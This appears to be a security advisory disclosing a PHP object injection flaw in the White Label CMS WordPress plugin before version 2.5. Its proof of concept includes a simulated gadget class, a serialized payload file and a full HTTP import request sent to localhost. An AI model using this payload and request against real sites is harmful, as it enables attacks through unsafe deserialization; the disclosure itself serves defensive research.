White Label CMS < 2.5 - Admin+ PHP Object Injection

The plugin unserializes user input provided via the settings, which could allow high-privilege users such as admin to perform PHP Object Injection when a suitable gadget is present.

PoC

To simulate a gadget chain, put the following code in a plugin: class Evil { public function __wakeup() : void { die(“Arbitrary deserialization”); } } Then create a file named “import.txt” with the following content: O:4:“Evil”:0:{}; And import the file via the “Import Settings” feature in Settings > White Label CMS (requires the White Label CMS plugin to be active). The view the response of the import request made, which will have the “Arbitrary deserialization” message POST /wp-admin/options-general.php?page=wlcms-plugin.php&view;=settings HTTP/1.1 Host: localhost:8888 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:107.0) Gecko/20100101 Firefox/107.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost:8888/wp-admin/options-general.php?page=wlcms-plugin.php Content-Type: multipart/form-data; boundary=---------------------------3253008022193750493240374932 Content-Length: 669 Origin: http://localhost:8888 Connection: close Cookie: [admin+] Upgrade-Insecure-Requests: 1 -----------------------------3253008022193750493240374932 Content-Disposition: form-data; name=“wlcms-settings_nonce” d8d0333b92 -----------------------------3253008022193750493240374932 Content-Disposition: form-data; name=“_wp_http_referer” /wp-admin/options-general.php?page=wlcms-plugin.php -----------------------------3253008022193750493240374932 Content-Disposition: form-data; name=“wlcms-settings” Save -----------------------------3253008022193750493240374932 Content-Disposition: form-data; name=“import_file”; filename=“import.txt” Content-Type: text/plain O:4:“Evil”:0:{}; -----------------------------3253008022193750493240374932–